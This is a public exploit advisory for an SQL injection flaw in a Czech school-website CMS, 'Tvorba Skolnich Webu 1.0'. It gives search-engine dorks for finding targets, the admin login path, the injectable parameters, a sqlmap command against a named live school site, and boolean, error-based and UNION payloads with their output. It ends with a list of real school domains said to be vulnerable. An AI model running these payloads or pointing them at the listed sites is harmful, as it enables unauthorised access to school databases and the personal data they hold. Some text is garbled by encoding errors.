Vitalex Computers SRO Tvorba Skolnich Webu version 1.0 suffers from a remote SQL injection vulnerability.
1dad829c4846963ac59b0c425e33076d############################################################
# Exploit Title : Vitalex Computers SRO Tvorba A!kolnAch webu 1.0 SQL
Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages : vitalex.cz
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba A!kolnAch webu''
site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
+ TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 -
+ CodeMirror 5.20.2
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236
############################################################
Czech Copyright A(c) 2011 - 2018 | Vitalex Computers s.r.o. -
Tvorba A!kolnAch webu SQL Injection Vulnerability
############################################################
# Admin Panel Login Path : /administrator/
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
############################################################
# SQL Injection Exploit =>
/public/printCalendar.php?id=[SQL Injection]
/public/printFood.php?id=[SQL Injection]
/public/script.php?id=[SQL Injection]
/public/setTemplate.php?id=[SQL Injection]
/public/statniSvatky.php?id=[SQL Injection]
/index.php?type=Blog&id=[SQL Injection]
/index.php?type=Contact&id=[SQL Injection]
/index.php?type=Post&id=[SQL Injection]
############################################################
[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM
(SELECT COUNT(*),CONCAT(0x7162627171,
(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=164 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,
0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372
49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL-- zEWq
########################################################################################
# Example Vulnerable Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept
] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of
Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] =>
archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
zas-me.cz/public/printCalendar.php?actions=1
gspsd.cz/public/printCalendar.php?actions=1
zusbenesov.cz/public/printCalendar.php?actions=2
zsmarsovska.cz/public/printCalendar.php?actions=2
zshortan.cz/public/printCalendar.php?actions=3
zsmspetrohrad.cz/public/printCalendar.php?actions=2
zsmsklecany.cz/public/printCalendar.php?actions=2
1zszatec.cz/public/printCalendar.php?actions=1
skolazrak.cz/public/printCalendar.php?actions=3
3zslouny.cz/public/printCalendar.php?actions=2
1zsjirkov.cz/public/printCalendar.php?actions=3
skolahotelnictvi.cz/public/printCalendar.php?actions=3
zsmsujezd.cz/public/printCalendar.php?actions=3
zsarnultovice.cz/public/printCalendar.php?actions=2
zuszandov.cz/public/printCalendar.php?actions=3
zsmschuchelna.cz/public/printCalendar.php?actions=3
zsprazacka.cz/public/printCalendar.php?actions=2
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################################